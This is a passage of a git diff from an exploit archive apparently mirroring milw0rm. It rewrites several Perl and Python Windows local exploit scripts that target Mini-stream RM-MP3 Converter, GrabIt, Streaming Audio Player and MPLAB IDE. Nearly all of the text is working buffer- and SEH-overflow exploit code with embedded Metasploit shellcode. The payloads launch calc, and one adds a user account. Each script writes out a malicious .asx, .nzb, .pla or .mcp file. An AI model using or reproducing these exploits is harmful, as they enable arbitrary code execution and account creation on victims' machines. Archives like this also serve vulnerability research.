+ "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". + "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + + open(RAM,'>>gnk.ram'); + print RAM $MSD.$RA.$SMN.$Shcode; + close(RAM); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8634.pl b/platforms/windows/local/8634.pl index 95f42817a..65abe1612 100755 --- a/platforms/windows/local/8634.pl +++ b/platforms/windows/local/8634.pl 
@@ -1,63 +1,63 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream RM-MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........ - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on Windows XP SP2... - [x] if you are not able to make this shit work, just put it in the Base/Root - of a Drive/Partition, like "C:\gnk.asx"... - -=cut - -my $MSD = "G" x 26110; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". 
- "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". - "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - -my $ASX = -" - Title is not important. - - Example... - - G4N0K - ©2009 G4N0K - -"; - - open(ASX,'>>gnk.asx'); - print ASX $ASX; - close(ASX); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream RM-MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........ + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on Windows XP SP2... + [x] if you are not able to make this shit work, just put it in the Base/Root + of a Drive/Partition, like "C:\gnk.asx"... 
+ +=cut + +my $MSD = "G" x 26110; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". + "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". + "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + +my $ASX = +" + Title is not important. + + Example... + + G4N0K + ©2009 G4N0K + +"; + + open(ASX,'>>gnk.asx'); + print ASX $ASX; + close(ASX); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8637.pl b/platforms/windows/local/8637.pl index 9daeed47f..ee6d063c8 100755 --- a/platforms/windows/local/8637.pl +++ b/platforms/windows/local/8637.pl 
@@ -1,90 +1,90 @@ -#!/usr/bin/perl -# theroadoutsidemyhouseispavedwithgoodintentions.pl -# AKA -# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit -# BY -# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009 -# *********************************************************************************************************** -# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as -# no surprise that it was a disappointment like so many others out there. I personally used to use this -# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure. -# *********************************************************************************************************** -# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow.. -# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice -# at the moment shall be.. update GrabIt quickly, like right now! -# *********************************************************************************************************** -# libeay32.dll -# -# 1001A384 5B POP EBX -# 1001A385 5D POP EBP -# 1001A386 C3 RETN -# -# This exploit has been successfully tested in the following environments... -# -# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe) -# GrabIt 1.7.2b2 (GrabIt172b2.exe) -# GrabIt 1.7.2b (GrabIt172b.exe) -# -# Windows XP Pro SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe) -# GrabIt 1.7.2b2 (GrabIt172b2.exe) -# GrabIt 1.7.2b (GrabIt172b.exe) -# -# *********************************************************************************************************** -# BRONBRONGOTMVP: The Houston and LA series is heating up! 
I got the Lakers in 6 :D -# *********************************************************************************************************** -# theroadoutsidemyhouseispavedwithgoodintentions.pl - -$nextsehh = 0x909006EB; # jmp 6 -$sehh = 0x1001A384; # pop, pop, ret @ libeay32.dll - -# win32_adduser - PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com -$sc = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". - "\x5b\xc1\xe6\x83\xeb\xfc\xe2\xf4\x14\xb3\x85\xe6\xe8\x5b\x4a\xa3". - "\xd4\xd0\xbd\xe3\x90\x5a\x2e\x6d\xa7\x43\x4a\xb9\xc8\x5a\x2a\xaf". - "\x63\x6f\x4a\xe7\x06\x6a\x01\x7f\x44\xdf\x01\x92\xef\x9a\x0b\xeb". - "\xe9\x99\x2a\x12\xd3\x0f\xe5\xe2\x9d\xbe\x4a\xb9\xcc\x5a\x2a\x80". - "\x63\x57\x8a\x6d\xb7\x47\xc0\x0d\x63\x47\x4a\xe7\x03\xd2\x9d\xc2". - "\xec\x98\xf0\x26\x8c\xd0\x81\xd6\x6d\x9b\xb9\xea\x63\x1b\xcd\x6d". - "\x98\x47\x6c\x6d\x80\x53\x2a\xef\x63\xdb\x71\xe6\xe8\x5b\x4a\x8e". - "\xd4\x04\xf0\x10\x88\x0d\x48\x1e\x6b\x9b\xba\xb6\x80\x25\x19\x04". - "\x9b\x33\x59\x18\x62\x55\x96\x19\x0f\x38\xac\x82\xc6\x3e\xb9\x83". - "\xc8\x74\xa2\xc6\x86\x3e\xb5\xc6\x9d\x28\xa4\x94\xc8\x28\xac\x8f". - "\x84\x3e\xb8\xc6\x8e\x3a\xa2\x83\xc8\x74\x80\xa2\xac\x7b\xe7\xc0". - "\xc8\x35\xa4\x92\xc8\x37\xae\x85\x89\x37\xa6\x94\x87\x2e\xb1\xc6". - "\xa9\x3f\xac\x8f\x86\x32\xb2\x92\x9a\x3a\xb5\x89\x9a\x28\xe1\x95". - "\x85\x32\xad\x83\x91\x7b\xee\xa7\xac\x1f\xc1\xe6"; - -$filename = $ARGV[0]; -$target = $ARGV[1]; - - print "\n GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit"; - print "\n Jeremy Brown [0xjbrown41\@gmail.com]\n"; - -if((!defined($filename) || !defined($target))) -{ - - print "\nUsage: $0 pwn.nzb \n"; - print "\nTargets: [1] Windows XP Home\n [2] Windows XP Pro\n\n"; - exit; - -} - -$nextseh = pack('l', $nextsehh); -$seh = pack('l', $sehh); -$nop = "\x90"; - -$nzb1 = "\n"; -$nzb2 = ""; } -if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . 
"\">"; } - - open(FILE, ">", $filename) or die("\nError: Can't write to $filename! Exploit stopped"); - print FILE $payload; - close(FILE); - - print "\nExploit NZB \"$filename\" successfully created.\n\n"; - exit; - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +# theroadoutsidemyhouseispavedwithgoodintentions.pl +# AKA +# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit +# BY +# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009 +# *********************************************************************************************************** +# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as +# no surprise that it was a disappointment like so many others out there. I personally used to use this +# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure. +# *********************************************************************************************************** +# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow.. +# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice +# at the moment shall be.. update GrabIt quickly, like right now! +# *********************************************************************************************************** +# libeay32.dll +# +# 1001A384 5B POP EBX +# 1001A385 5D POP EBP +# 1001A386 C3 RETN +# +# This exploit has been successfully tested in the following environments... +# +# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe) +# GrabIt 1.7.2b2 (GrabIt172b2.exe) +# GrabIt 1.7.2b (GrabIt172b.exe) +# +# Windows XP Pro SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe) +# GrabIt 1.7.2b2 (GrabIt172b2.exe) +# GrabIt 1.7.2b (GrabIt172b.exe) +# +# *********************************************************************************************************** +# BRONBRONGOTMVP: The Houston and LA series is heating up! 
I got the Lakers in 6 :D +# *********************************************************************************************************** +# theroadoutsidemyhouseispavedwithgoodintentions.pl + +$nextsehh = 0x909006EB; # jmp 6 +$sehh = 0x1001A384; # pop, pop, ret @ libeay32.dll + +# win32_adduser - PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com +$sc = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". + "\x5b\xc1\xe6\x83\xeb\xfc\xe2\xf4\x14\xb3\x85\xe6\xe8\x5b\x4a\xa3". + "\xd4\xd0\xbd\xe3\x90\x5a\x2e\x6d\xa7\x43\x4a\xb9\xc8\x5a\x2a\xaf". + "\x63\x6f\x4a\xe7\x06\x6a\x01\x7f\x44\xdf\x01\x92\xef\x9a\x0b\xeb". + "\xe9\x99\x2a\x12\xd3\x0f\xe5\xe2\x9d\xbe\x4a\xb9\xcc\x5a\x2a\x80". + "\x63\x57\x8a\x6d\xb7\x47\xc0\x0d\x63\x47\x4a\xe7\x03\xd2\x9d\xc2". + "\xec\x98\xf0\x26\x8c\xd0\x81\xd6\x6d\x9b\xb9\xea\x63\x1b\xcd\x6d". + "\x98\x47\x6c\x6d\x80\x53\x2a\xef\x63\xdb\x71\xe6\xe8\x5b\x4a\x8e". + "\xd4\x04\xf0\x10\x88\x0d\x48\x1e\x6b\x9b\xba\xb6\x80\x25\x19\x04". + "\x9b\x33\x59\x18\x62\x55\x96\x19\x0f\x38\xac\x82\xc6\x3e\xb9\x83". + "\xc8\x74\xa2\xc6\x86\x3e\xb5\xc6\x9d\x28\xa4\x94\xc8\x28\xac\x8f". + "\x84\x3e\xb8\xc6\x8e\x3a\xa2\x83\xc8\x74\x80\xa2\xac\x7b\xe7\xc0". + "\xc8\x35\xa4\x92\xc8\x37\xae\x85\x89\x37\xa6\x94\x87\x2e\xb1\xc6". + "\xa9\x3f\xac\x8f\x86\x32\xb2\x92\x9a\x3a\xb5\x89\x9a\x28\xe1\x95". + "\x85\x32\xad\x83\x91\x7b\xee\xa7\xac\x1f\xc1\xe6"; + +$filename = $ARGV[0]; +$target = $ARGV[1]; + + print "\n GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit"; + print "\n Jeremy Brown [0xjbrown41\@gmail.com]\n"; + +if((!defined($filename) || !defined($target))) +{ + + print "\nUsage: $0 pwn.nzb \n"; + print "\nTargets: [1] Windows XP Home\n [2] Windows XP Pro\n\n"; + exit; + +} + +$nextseh = pack('l', $nextsehh); +$seh = pack('l', $sehh); +$nop = "\x90"; + +$nzb1 = "\n"; +$nzb2 = ""; } +if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . 
"\">"; } + + open(FILE, ">", $filename) or die("\nError: Can't write to $filename! Exploit stopped"); + print FILE $payload; + close(FILE); + + print "\nExploit NZB \"$filename\" successfully created.\n\n"; + exit; + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8640.pl b/platforms/windows/local/8640.pl index ae04a782a..eaab06e6f 100755 --- a/platforms/windows/local/8640.pl +++ b/platforms/windows/local/8640.pl 
@@ -1,42 +1,42 @@ -# by : Hakxer -> EgY Coders Team -# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit -# hakxer.1@gmail.com -# Greetz : Allah -# , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends -########################################################################## - -$buff="\x41" x 288; -$ret="\x77\xE9\xAE\x59"; # 0x77E9AE59 call esp -$nops="\x90" x 20; -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -$shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37". -"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x31\x4b\x38". -"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x48". -"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38". -"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34". -"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58". -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43". -"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37". -"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x58\x42\x47\x4e\x31\x4d\x4a". -"\x4b\x58\x4a\x56\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b". -"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x43\x4f\x55\x41\x53". -"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47". -"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x50\x4f\x55\x4a\x56\x4a\x39". -"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x36\x43\x56\x42\x50\x5a"; -open(MYFILE,'>>exploit.pla'); -print MYFILE $buff; -print MYFILE $ret; -print MYFILE $nops; -print MYFILE $shellcode; -close(MYFILE); - -# milw0rm.com [2009-05-07] +# by : Hakxer -> EgY Coders Team +# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit +# hakxer.1@gmail.com +# Greetz : Allah +# , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends +########################################################################## + +$buff="\x41" x 288; +$ret="\x77\xE9\xAE\x59"; # 0x77E9AE59 call esp +$nops="\x90" x 20; +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +$shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37". +"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x31\x4b\x38". +"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x48". +"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38". +"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34". +"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58". +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43". +"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37". +"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x58\x42\x47\x4e\x31\x4d\x4a". +"\x4b\x58\x4a\x56\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b". +"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x43\x4f\x55\x41\x53". +"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47". 
+"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x50\x4f\x55\x4a\x56\x4a\x39". +"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x36\x43\x56\x42\x50\x5a"; +open(MYFILE,'>>exploit.pla'); +print MYFILE $buff; +print MYFILE $ret; +print MYFILE $nops; +print MYFILE $shellcode; +close(MYFILE); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8656.py b/platforms/windows/local/8656.py index f62a00f6c..f094c2020 100755 --- a/platforms/windows/local/8656.py +++ b/platforms/windows/local/8656.py 
@@ -1,78 +1,78 @@ -# usage: mplab.py then open the project file :) -# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p) -print "**************************************************************************" -print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n" -print " Refer : Secunia advisory (35054)\n" -print " Exploit code: His0k4\n" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz),snakespc.com\n" -print "**************************************************************************" - - -header1 = ( -"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f" -"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37" -"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d" -"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66" -"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d" -"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69" -"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d" -"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f" -"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a" -"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b" -"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53" -"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e" -"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d" -"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65" -"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65" -"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c" -"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b" -"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69" -"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37" -"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41" 
-"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a" -"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54" -"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54" -"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d" -"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33" -"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22") - -header2 = ( -"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41" -"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42" -"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d" -"\x0d\x0a") - - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode=( -"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79" -"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54" -"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58" -"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c" -"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77" -"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35" -"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a" -"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79" -"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15" -"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11") - -buff = "\x41" * (226-len(shellcode)) -next_seh = "\x74\xc9\x41\x42" -seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe -nops1 = "\x90"*20 -nops2 = "\x90"*28 -mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p - -exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2 - -try: - out_file = open("exploit.mcp",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-05-11] +# usage: mplab.py then open the project file :) +# Download : 
http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p) +print "**************************************************************************" +print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n" +print " Refer : Secunia advisory (35054)\n" +print " Exploit code: His0k4\n" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz),snakespc.com\n" +print "**************************************************************************" + + +header1 = ( +"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f" +"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37" +"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d" +"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66" +"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d" +"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69" +"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d" +"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f" +"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a" +"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b" +"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53" +"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e" +"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d" +"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65" +"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65" +"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c" 